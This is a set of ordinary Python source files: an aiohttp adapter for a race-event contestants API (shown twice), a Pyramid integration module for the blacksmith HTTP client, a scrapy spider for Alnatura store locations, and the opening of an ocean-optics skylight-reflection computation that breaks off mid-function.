contestant function.""" id = "" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) async with ClientSession() as session: async with session.post( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers, json=request_body, ) as resp: if resp.status == 201: logging.debug(f"result - got response {resp}") location = resp.headers[hdrs.LOCATION] id = location.split(os.path.sep)[-1] else: servicename = "create_contestant" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) return id async def create_contestants(self, token: str, event_id: str, inputfile) -> str: """Create new contestants function.""" headers = { hdrs.CONTENT_TYPE: "text/csv", hdrs.AUTHORIZATION: f"Bearer {token}", } logging.debug(f"Create contestants - got file {inputfile}") async with ClientSession() as session: async with session.post( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers, data=inputfile, ) as resp: res = resp.status logging.info(f"result - got response {res} - {resp}") if res == 200: res = await resp.json() else: servicename = "create_contestants" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) return str(res) async def delete_all_contestants(self, token: str, event_id: str) -> str: """Delete all contestants in one event function.""" headers = { hdrs.AUTHORIZATION: f"Bearer {token}", } async with ClientSession() as session: async with session.delete( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers, ) as resp: res = resp.status logging.debug(f"delete all result - got response {resp}") if res == 204: pass else: servicename = "delete_all_contestants" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." 
) return str(res) async def delete_contestant( self, token: str, event_id: str, contestant_id: str ) -> str: """Delete one contestant function.""" headers = { hdrs.AUTHORIZATION: f"Bearer {token}", } async with ClientSession() as session: async with session.delete( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants/{contestant_id}", headers=headers, ) as resp: res = resp.status logging.debug(f"delete result - got response {resp}") if res == 204: pass else: servicename = "delete_contestant" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) return str(res) async def get_all_contestants_by_ageclass( self, token: str, event_id: str, ageclass_name: str ) -> List: """Get all contestants / by class (optional) function.""" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestants = [] async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers ) as resp: logging.debug(f"get_all_contestants - got response {resp.status}") if resp.status == 200: contestants = await resp.json() else: servicename = "get_all_contestants_by_ageclass" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) # TODO: Bør flyttes til backend if ageclass_name != "": tmp_contestants = [] for x in contestants: if x["ageclass"] == ageclass_name: tmp_contestants.append(x) contestants = tmp_contestants return contestants async def get_all_contestants_by_raceclass( self, token: str, event_id: str, raceclass_name: str ) -> List: """Get all contestants / by class function.""" ageclasses = [] raceclasses = await RaceclassesAdapter().get_raceclasses(token, event_id) for raceclass in raceclasses: if raceclass["name"] == raceclass_name: ageclasses.append(raceclass["ageclass_name"]) headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestants = [] async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers ) as resp: logging.debug(f"get_all_contestants - got response {resp.status}") if resp.status == 200: contestants = await resp.json() else: servicename = "get_all_contestants_by_ageclass" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." 
) # TODO: Bør flyttes til backend tmp_contestants = [] for x in contestants: if x["ageclass"] in ageclasses: tmp_contestants.append(x) contestants = tmp_contestants return contestants async def get_contestant_by_bib(self, token: str, event_id: str, bib: str) -> dict: """Get contestant by bib function.""" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestant = [] async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants?bib={bib}", headers=headers, ) as resp: logging.debug( f"get_contestants_by_raceclass - got response {resp.status}" ) if resp.status == 200: contestant = await resp.json() else: servicename = "get_contestants_by_bib" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) if len(contestant) == 0: return {} return contestant[0] async def get_contestants_by_raceclass( self, token: str, event_id: str, raceclass: str ) -> List: """Get all contestants by raceclass function.""" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestants = [] async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants?raceclass={raceclass}", headers=headers, ) as resp: logging.debug( f"get_contestants_by_raceclass - got response {resp.status}" ) if resp.status == 200: contestants = await resp.json() else: servicename = "get_contestants_by_raceclass" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) return contestants async def get_contestant( self, token: str, event_id: str, contestant_id: str ) -> dict: """Get all contestant function.""" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestant = {} async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants/{contestant_id}", headers=headers, ) as resp: logging.debug(f"get_contestant - got response {resp.status}") if resp.status == 200: contestant = await resp.json() else: servicename = "get_contestant" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) return contestant async def update_contestant( self, token: str, event_id: str, contestant: dict ) -> str: """Create new contestants function.""" request_body = copy.deepcopy(contestant) logging.debug(f"update_contestants, got request_body {request_body}") url = f"{EVENT_SERVICE_URL}/events/{event_id}/contestants/{contestant["id"]}" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) async with ClientSession() as session: async with session.put(url, headers=headers, json=request_body) as resp: res = resp.status if res == 204: logging.debug(f"result - got response {resp}") else: servicename = "update_contestant" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) return str(resp.status)
"""Module for contestants adapter.""" import copy import logging import os from typing import List from aiohttp import ClientSession from aiohttp import hdrs, web from multidict import MultiDict from .raceclasses_adapter import RaceclassesAdapter EVENTS_HOST_SERVER = os.getenv("EVENTS_HOST_SERVER", "localhost") EVENTS_HOST_PORT = os.getenv("EVENTS_HOST_PORT", "8082") EVENT_SERVICE_URL = f"http://{EVENTS_HOST_SERVER}:{EVENTS_HOST_PORT}" class ContestantsAdapter: """Class representing contestants.""" async def assign_bibs(self, token: str, event_id: str) -> str: """Generate bibs based upon registrations.""" headers = MultiDict([(hdrs.AUTHORIZATION, f"Bearer {token}")]) url = f"{EVENT_SERVICE_URL}/events/{event_id}/contestants/assign-bibs" async with ClientSession() as session: async with session.post(url, headers=headers) as resp: res = resp.status logging.debug(f"assign_bibs result - got response {resp}") if res == 201: pass else: servicename = "assign_bibs" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) information = "Startnummer tildelt." return information async def create_contestant( self, token: str, event_id: str, request_body: dict ) -> str: """Create new contestant function.""" id = "" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) async with ClientSession() as session: async with session.post( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers, json=request_body, ) as resp: if resp.status == 201: logging.debug(f"result - got response {resp}") location = resp.headers[hdrs.LOCATION] id = location.split(os.path.sep)[-1] else: servicename = "create_contestant" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) return id async def create_contestants(self, token: str, event_id: str, inputfile) -> str: """Create new contestants function.""" headers = { hdrs.CONTENT_TYPE: "text/csv", hdrs.AUTHORIZATION: f"Bearer {token}", } logging.debug(f"Create contestants - got file {inputfile}") async with ClientSession() as session: async with session.post( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers, data=inputfile, ) as resp: res = resp.status logging.info(f"result - got response {res} - {resp}") if res == 200: res = await resp.json() else: servicename = "create_contestants" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) return str(res) async def delete_all_contestants(self, token: str, event_id: str) -> str: """Delete all contestants in one event function.""" headers = { hdrs.AUTHORIZATION: f"Bearer {token}", } async with ClientSession() as session: async with session.delete( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers, ) as resp: res = resp.status logging.debug(f"delete all result - got response {resp}") if res == 204: pass else: servicename = "delete_all_contestants" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." 
) return str(res) async def delete_contestant( self, token: str, event_id: str, contestant_id: str ) -> str: """Delete one contestant function.""" headers = { hdrs.AUTHORIZATION: f"Bearer {token}", } async with ClientSession() as session: async with session.delete( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants/{contestant_id}", headers=headers, ) as resp: res = resp.status logging.debug(f"delete result - got response {resp}") if res == 204: pass else: servicename = "delete_contestant" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) return str(res) async def get_all_contestants_by_ageclass( self, token: str, event_id: str, ageclass_name: str ) -> List: """Get all contestants / by class (optional) function.""" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestants = [] async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers ) as resp: logging.debug(f"get_all_contestants - got response {resp.status}") if resp.status == 200: contestants = await resp.json() else: servicename = "get_all_contestants_by_ageclass" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) # TODO: Bør flyttes til backend if ageclass_name != "": tmp_contestants = [] for x in contestants: if x["ageclass"] == ageclass_name: tmp_contestants.append(x) contestants = tmp_contestants return contestants async def get_all_contestants_by_raceclass( self, token: str, event_id: str, raceclass_name: str ) -> List: """Get all contestants / by class function.""" ageclasses = [] raceclasses = await RaceclassesAdapter().get_raceclasses(token, event_id) for raceclass in raceclasses: if raceclass["name"] == raceclass_name: ageclasses.append(raceclass["ageclass_name"]) headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestants = [] async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers ) as resp: logging.debug(f"get_all_contestants - got response {resp.status}") if resp.status == 200: contestants = await resp.json() else: servicename = "get_all_contestants_by_ageclass" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." 
) # TODO: Bør flyttes til backend tmp_contestants = [] for x in contestants: if x["ageclass"] in ageclasses: tmp_contestants.append(x) contestants = tmp_contestants return contestants async def get_contestant_by_bib(self, token: str, event_id: str, bib: str) -> dict: """Get contestant by bib function.""" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestant = [] async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants?bib={bib}", headers=headers, ) as resp: logging.debug( f"get_contestants_by_raceclass - got response {resp.status}" ) if resp.status == 200: contestant = await resp.json() else: servicename = "get_contestants_by_bib" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) if len(contestant) == 0: return {} return contestant[0] async def get_contestants_by_raceclass( self, token: str, event_id: str, raceclass: str ) -> List: """Get all contestants by raceclass function.""" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestants = [] async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants?raceclass={raceclass}", headers=headers, ) as resp: logging.debug( f"get_contestants_by_raceclass - got response {resp.status}" ) if resp.status == 200: contestants = await resp.json() else: servicename = "get_contestants_by_raceclass" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) return contestants async def get_contestant( self, token: str, event_id: str, contestant_id: str ) -> dict: """Get all contestant function.""" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestant = {} async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants/{contestant_id}", headers=headers, ) as resp: logging.debug(f"get_contestant - got response {resp.status}") if resp.status == 200: contestant = await resp.json() else: servicename = "get_contestant" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) return contestant async def update_contestant( self, token: str, event_id: str, contestant: dict ) -> str: """Create new contestants function.""" request_body = copy.deepcopy(contestant) logging.debug(f"update_contestants, got request_body {request_body}") url = f"{EVENT_SERVICE_URL}/events/{event_id}/contestants/{contestant['id']}" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) async with ClientSession() as session: async with session.put(url, headers=headers, json=request_body) as resp: res = resp.status if res == 204: logging.debug(f"result - got response {resp}") else: servicename = "update_contestant" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) return str(resp.status)
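# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the adapter itself): a minimal aiohttp
# handler that drives ContestantsAdapter.assign_bibs. The route layout,
# token extraction and response shape are assumptions made for this example
# only; the surrounding service may expose this differently.
async def assign_bibs_handler(request: web.Request) -> web.Response:
    """Sketch: assign bibs for the event id taken from the URL."""
    # assumption: the caller forwards "Authorization: Bearer <token>"
    token = request.headers.get(hdrs.AUTHORIZATION, "").replace("Bearer ", "", 1)
    event_id = request.match_info["event_id"]
    information = await ContestantsAdapter().assign_bibs(token, event_id)
    return web.json_response({"detail": information})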
from typing import Any, Callable, Dict, Iterator, List, Optional, Type, cast import blacksmith from blacksmith import ( CollectionParser, HTTPTimeout, PrometheusMetrics, SyncAbstractServiceDiscovery, SyncAbstractTransport, SyncClient, SyncClientFactory, SyncConsulDiscovery, SyncHTTPMiddleware, SyncRouterDiscovery, SyncStaticDiscovery, ) from blacksmith.typing import Proxies, Service, Url from pyramid.config import Configurator # type: ignore from pyramid.exceptions import ConfigurationError # type: ignore from pyramid.request import Request # type: ignore from pyramid.settings import asbool, aslist # type: ignore from pyramid_blacksmith.middleware_factory import AbstractMiddlewareFactoryBuilder from .typing import Settings from .utils import list_to_dict, resolve_entrypoint class SettingsBuilder: def __init__( self, settings: Settings, metrics: PrometheusMetrics, prefix: str = "client" ): self.settings = settings self.prefix = f"blacksmith.{prefix}" self.metrics = metrics class BlacksmithPrometheusMetricsBuilder: def __init__(self, settings: Settings): self.settings = settings self.prefix = "blacksmith.prometheus_buckets" def build(self) -> PrometheusMetrics: buckets_list = list_to_dict(self.settings, self.prefix) buckets: Dict[str, List[float]] = {} for key, vals in buckets_list.items(): buckets[key] = [float(val) for val in vals.split()] metrics = PrometheusMetrics(**buckets) return metrics class BlacksmithClientSettingsBuilder(SettingsBuilder): def build(self) -> SyncClientFactory[Any, Any]: sd = self.build_sd_strategy() timeout = self.get_timeout() proxies = self.get_proxies() verify = self.get_verify_certificate() transport = self.build_transport() collection_parser = self.build_collection_parser() ret: SyncClientFactory[Any, Any] = SyncClientFactory( sd, timeout=timeout, proxies=proxies, verify_certificate=verify, transport=transport, collection_parser=collection_parser, ) for mw in self.build_middlewares(self.metrics): ret.add_middleware(mw) return ret def build_sd_static(self) -> SyncStaticDiscovery: key = f"{self.prefix}.static_sd_config" services_endpoints = list_to_dict(self.settings, key) services: Dict[Service, Url] = {} for api_v, url in services_endpoints.items(): api, version = api_v.split("/", 1) if "/" in api_v else (api_v, None) services[(api or "", version)] = url return SyncStaticDiscovery(services) def build_sd_consul(self) -> SyncConsulDiscovery: key = f"{self.prefix}.consul_sd_config" kwargs = list_to_dict(self.settings, key) return SyncConsulDiscovery(**kwargs) # type: ignore def build_sd_router(self) -> SyncRouterDiscovery: key = f"{self.prefix}.router_sd_config" kwargs = list_to_dict(self.settings, key) return SyncRouterDiscovery(**kwargs) def build_sd_strategy(self) -> SyncAbstractServiceDiscovery: sd_classes: Dict[str, Callable[[], SyncAbstractServiceDiscovery]] = { "static": self.build_sd_static, "consul": self.build_sd_consul, "router": self.build_sd_router, } key = f"{self.prefix}.service_discovery" sd_name = self.settings.get(key) if not sd_name: raise ConfigurationError(f"Missing setting {key}") if sd_name not in sd_classes: raise ConfigurationError( f"Invalid value {sd_name} for {key}: " f"not in {', '.join(sd_classes.keys())}" ) return sd_classes[sd_name]() def get_timeout(self) -> HTTPTimeout: kwargs = {} for key in ( (f"{self.prefix}.read_timeout", "read"), (f"{self.prefix}.connect_timeout", "connect"), ): if key[0] in self.settings: kwargs[key[1]] = int(self.settings[key[0]]) return HTTPTimeout(**kwargs) def get_proxies(self) -> Optional[Proxies]: key 
= f"{self.prefix}.proxies" if key in self.settings: return cast(Proxies, list_to_dict(self.settings, key)) or None return None def get_verify_certificate(self) -> bool: return asbool(self.settings.get(f"{self.prefix}.verify_certificate", True)) def build_transport(self) -> Optional[SyncAbstractTransport]: value = self.settings.get(f"{self.prefix}.transport") if not value: return None if isinstance(value, SyncAbstractTransport): return value cls = resolve_entrypoint(value) return cls() def build_collection_parser(self) -> Type[CollectionParser]: value = self.settings.get(f"{self.prefix}.collection_parser") if not value: return CollectionParser if isinstance(value, type) and issubclass(value, CollectionParser): return value # type: ignore cls = resolve_entrypoint(value) return cls # type: ignore def build_middlewares( self, metrics: PrometheusMetrics ) -> Iterator[SyncHTTPMiddleware]: value = aslist( self.settings.get(f"{self.prefix}.middlewares", []), flatten=False ) classes = { "prometheus": "pyramid_blacksmith.middleware:PrometheusMetricsBuilder", "circuitbreaker": "pyramid_blacksmith.middleware:CircuitBreakerBuilder", "http_cache": "pyramid_blacksmith.middleware:HTTPCacheBuilder", } for middleware in value: try: middleware, cls = middleware.split(maxsplit=1) except ValueError: cls = classes.get(middleware, middleware) cls = resolve_entrypoint(cls) instance = cls( self.settings, f"{self.prefix}.middleware.{middleware}", metrics, ).build() yield instance class BlacksmithMiddlewareFactoryBuilder(SettingsBuilder): """ Parse the settings like: :: blacksmith.client.middleware_factories = forward_header blacksmith.client.middleware_factory.forward_header = Authorization """ def build(self) -> Iterator[AbstractMiddlewareFactoryBuilder]: classes = { "forward_header": ( "pyramid_blacksmith.middleware_factory:ForwardHeaderFactoryBuilder" ), } value = aslist( self.settings.get(f"{self.prefix}.middleware_factories", []), flatten=False ) for middleware in value: try: middleware, cls = middleware.split(maxsplit=1) except ValueError: cls = classes.get(middleware, middleware) key = f"{self.prefix}.middleware_factory.{middleware}" kwargs = list_to_dict(self.settings, key, with_flag=True) cls = resolve_entrypoint(cls) yield cls(**kwargs) class PyramidBlacksmith: """ Type of the `request.blacksmith` property. This can be used to create a ``Protocol`` of the pyramid ``Request`` in final application for typing purpose. Example: .. code-block:: from pyramid_blacksmith import PyramidBlacksmith class RequestProtocol(Protocol): blacksmith: PyramidBlacksmith def my_view(request: RequestProtocol): ... """ def __init__( self, request: Request, clients: Dict[str, SyncClientFactory[Any, Any]], middleware_factories: Dict[str, List[AbstractMiddlewareFactoryBuilder]], ): self.request = request self.clients = clients self.middleware_factories = middleware_factories def __getattr__(self, name: str) -> Callable[[str], SyncClient[Any, Any]]: """ Return the blacksmith client factory named in the configuration. 
""" def get_client(client_name: str) -> SyncClient[Any, Any]: try: client_factory = self.clients[name] except KeyError as k: raise AttributeError(f"Client {k} is not registered") cli = client_factory(client_name) for middleware_factory in self.middleware_factories.get(name, []): cli.add_middleware(middleware_factory(self.request)) return cli return get_client def blacksmith_binding_factory( config: Configurator, ) -> Callable[[Request], PyramidBlacksmith]: settings: Settings = config.registry.settings clients_key = aslist(settings.get("blacksmith.clients", ["client"])) metrics = BlacksmithPrometheusMetricsBuilder(settings).build() clients_dict = { key: BlacksmithClientSettingsBuilder(settings, metrics, key).build() for key in clients_key } middleware_factories = { key: list(BlacksmithMiddlewareFactoryBuilder(settings, metrics, key).build()) for key in clients_key } def blacksmith_binding(request: Request) -> PyramidBlacksmith: return PyramidBlacksmith(request, clients_dict, middleware_factories) return blacksmith_binding def includeme(config: Configurator): """ Expose the method consume by the Configurator while using: :: config.include('pyramid_blacksmith') This will inject the request property ``request.blacksmith`` like the pyramid view below: :: def my_view(request): api = request.blacksmith.client("api") ... """ resources = aslist(config.registry.settings.get("blacksmith.scan", [])) blacksmith.scan(*resources) config.add_request_method( callable=blacksmith_binding_factory(config), name="blacksmith", property=True, reify=False, )
import scrapy import re import json from locations.items import GeojsonPointItem from locations.hours import OpeningHours DAY_MAPPING = { 1: 'Mo', 2: 'Tu', 3: 'We', 4: 'Th', 5: 'Fr', 6: 'Sa', 7: 'Su', 'Mo': 1, 'Tu': 2, 'We': 3, 'Th': 4, 'Fr': 5, 'Sa': 6, 'Su': 7 } class AlnaturaSpider(scrapy.Spider): name = "alnatura_de" allowed_domains = ["www.alnatura.de"] start_urls = ( 'https://www.alnatura.de/api/sitecore/stores/FindStoresforMap?' 'ElementsPerPage=10000&lat=50.99820058296841' '&lng=7.811966062500009&radius=1483' '&Tradepartner=Alnatura%20Super%20Natur%20Markt', ) def parse_hours(self, store_hours): opening_hours = OpeningHours() match = re.match(r'(.+?)-(.+?) +(\d.*?)-(.+?) Uhr', store_hours) if match: from_day = match.group(1).strip() to_day = match.group(2).strip() from_time = match.group(3).strip().replace(':','.') to_time = match.group(4).strip().replace(':','.') fhours = int(float(from_time)) fminutes = (float(from_time) * 60) % 60 fmt_from_time = "%d:%02d" % (fhours, fminutes) thours = int(float(to_time)) tminutes = (float(to_time) * 60) % 60 fmt_to_time = "%d:%02d" % (thours, tminutes) for day in range(DAY_MAPPING[from_day], DAY_MAPPING[to_day] + 1): opening_hours.add_range( day=DAY_MAPPING[day], open_time=fmt_from_time, close_time=fmt_to_time, time_format='%H:%M' ) return opening_hours.as_opening_hours() def parse_stores(self, response): store = json.loads(response.text) store = store['Payload'] properties = { 'lat': response.meta.get('lat'), 'lon': response.meta.get('lng'), 'name': store['StoreName'], 'street': store['Street'], 'city': store['City'], 'postcode': store['PostalCode'], 'phone': store['Tel'], 'country': store['Country'], 'ref': response.meta.get('id'), } if store['OpeningTime']: hours = self.parse_hours(store.get('OpeningTime')) if hours: properties["opening_hours"] = hours yield GeojsonPointItem(**properties) def parse(self, response): data = json.loads(response.text) for stores in data['Payload']: yield scrapy.Request( f"https://www.alnatura.de/api/sitecore/stores/StoreDetails" f"?storeid={stores['Id']}", callback=self.parse_stores, meta={ 'lat': stores['Lat'].replace(',', '.'), 'lng': stores['Lng'].replace(',', '.'), 'id': stores['Id'], } )
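# ---------------------------------------------------------------------------
# Hedged usage sketch: a stand-alone check of the opening-hours parsing
# above. The sample string ("Mo-Sa 7:00-20:00 Uhr") and the rough expected
# output are assumptions for illustration; parse_hours rewrites ':' as '.'
# so the times can be handled as decimal hours before being reformatted as
# HH:MM strings.
if __name__ == "__main__":  # illustrative only
    spider = AlnaturaSpider()
    print(spider.parse_hours("Mo-Sa 7:00-20:00 Uhr"))
    # expected to print something like "Mo-Sa 07:00-20:00"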
# import argparse import collections from functools import partial import pathlib import sys import time import numpy as np from scipy.interpolate import interpn import xarray as xr from Utilities import Utilities # optional, see printProgressBar below π = np.pi db_path = './Data/Zhang_rho_db.mat' #Groups in db.mat db, quads, sdb, vdb = None, None, None, None #Vars. in db.mat skyrad0, sunrad0, rad_boa_sca, rad_boa_vec = None, None, None, None def load_db(db_path=db_path): global db, quads, sdb, vdb global skyrad0, sunrad0, rad_boa_sca, rad_boa_vec db = xr.open_dataset(db_path, group='db', engine='netcdf4') quads = xr.open_dataset(db_path, group='quads', engine='netcdf4') sdb = xr.open_dataset(db_path, group='sdb', engine='netcdf4') vdb = xr.open_dataset(db_path, group='vdb', engine='netcdf4') skyrad0 = xr.open_dataset(db_path, engine='netcdf4')['skyrad0'] sunrad0 = xr.open_dataset(db_path, engine='netcdf4')['sunrad0'] rad_boa_sca = xr.open_dataset(db_path, engine='netcdf4')['Radiance_BOA_sca'] rad_boa_vec = xr.open_dataset(db_path, engine='netcdf4')['Radiance_BOA_vec'] def my_sph2cart(azm, zen, r=1): """ Converts spherical coordinates to cartesian Inputs ------- azm [Numpy array] : -azimuth angle zen [Numpy array] : zenith angle r [float] : radius = 1 Outputs ------- x : y : z : """ def sph2cart(azm, elev, r): cos_elev = np.cos(elev) x = r * cos_elev * np.cos(azm) y = r * cos_elev * np.sin(azm) z = r * np.sin(elev) return x, y, z x, y, z = sph2cart(azm, π/2 - zen, r) return np.c_[x.ravel(), y.ravel(), z.ravel()].squeeze() def find_quads(zen, azm): """ Finds location in quads (why is it called find_quads?) Inputs ------ zen : azm : Outputs ------- locs : """ loc = None try: # with xr.open_dataset(db_path, group='quads') as quads: tmp = np.sqrt((quads.zen[:] - zen)**2 + (quads.azm[:] - azm)**2) loc = np.argmin(tmp.data) except: print('Unable to read quads data') finally: return loc def get_prob(wind, vec): """ Computes probability of sky light being reflected into the sensor Inputs ------ wind : Wind speed (m/s) vec : sensor vector Outputs ------- prob [np.array] : probability of sky light reflected into the sensor angr_sky[np.array] : reflection angle """ # with xr.open_dataset(db_path, group='quads') as quads: # zen = quads.zen.data[0] # if len(vec.shape) == 1: # vec = vec.reshape(1,vec.size) # prob = np.nan * np.ones((len(zen), len(wind)*vec.shape[0])) # angr_sky = prob.copy() # k = -1 # for w in wind: # for v in vec: # k = k + 1 # prob[:,k], angr_sky[:,k] = skylight_reflection2(w, v) prob, angr_sky = skylight_reflection2(wind, vec) return prob, angr_sky def skylight_reflection2(wind, sensor): """ Computes probability of light reflection at angle. 
Inputs ------ wind : Wind speed (m/s) sensor : Numpy array The vector of reflected light measured by the sensor quads : Sky light quads """ def gen_vec(zens,azms): # generate vectors from permutation of zenith and azimuth angles zens,azms = np.meshgrid(zens,azms) zens = zens[:] azms = azms[:] # vector expression vec = my_sph2cart(azms,zens,1) return vec def gen_vec_quad(zen,du,azm,dphi,num): half_azm = np.linspace(-dphi/2,dphi/2,num) half_zen = np.linspace(-du/2/np.sin(zen), du/2/np.sin(zen),num) vec = gen_vec(zen+half_zen, azm+half_azm) return vec # initialize prob = quads.zen.data[0].copy() ang = prob.copy() # polar quad, 1st in quads zen0 = quads.zen.data[0][0] # generate sky vector num = 100 p_vec = gen_vec_polar(zen0, quads.sun05.data, num) # -p_vec represent vectors coming from the sky prob[0], ang[0] = prob_reflection(-p_vec, sensor, wind) # non-polar quads num = 10 # the number of individual vectors du = quads.du.data dphi = quads.dphi.data ''' Making copies of the vectors saves processing time''' zen = quads.zen.data[0].copy() azm = quads.azm.data[0].copy() t0 = time.time() ''' standard loop. Takes ages on certain machines.''' Utilities.printProgressBar(0, len(prob), prefix = 'Progress:', suffix = 'Complete', length = 50) for i in np.arange(1, prob.size): Utilities.printProgressBar(i+1, len(prob), prefix = 'Progress:', suffix = 'Complete', length = 50) # sky = gen_vec_quad(quads.zen.data[0][i],du,quads.azm.data[0][i],dphi,num) sky = gen_vec_quad(zen[i],du,azm[i],dphi,num) prob[i],ang[i] = prob_reflection(-sky,sensor,wind) ''' vectorized solution for sky. Unable to allocate an array this large 924760x924760''' # sky = gen_vec_quad(zen,du,azm,dphi,num) ''' comprehension. CPU 100%+. After lengthy delay -> Exception: Too many values to unpack''' # prob, ang = [(prob_reflection( # -gen_vec_quad(zen[i], # du,azm[i], # dphi,num),sensor,wind)) for i in np.arange(1, prob.size)] ''' mapped, nested lambdas. Returns a map? Not callable''' # sky = map(lambda zen : map(lambda azm : gen_vec_quad(zen,du,azm,dphi,num), # quads.azm.data[0]), # quads.zen.data[0]) ''' lambda sky plus loop. Takes same time as loop. Resource used is 100%+ CPU, NOT memory''' # sky = lambda x, y: gen_vec_quad(x,du,y,dphi,num) # for i in np.arange(1, prob.size): # prob[i],ang[i] = prob_reflection(-sky(zen[i], azm[i]),sensor,wind) '''nested lambdas. Unable to allocate an array with shape 924760x924760 ''' # probref = lambda x, y, z: prob_reflection(-x, y, z) # prob, ang = probref(-sky(quads.zen.data[0], quads.azm.data[0]), sensor, wind) t1 = time.time() print(f'Time elapsed: {round(t1-t0)} seconds') return prob, ang def my_cart2sph(n): def cart2sph(x,y,z): azimuth = np.arctan2(y,x) elevation = 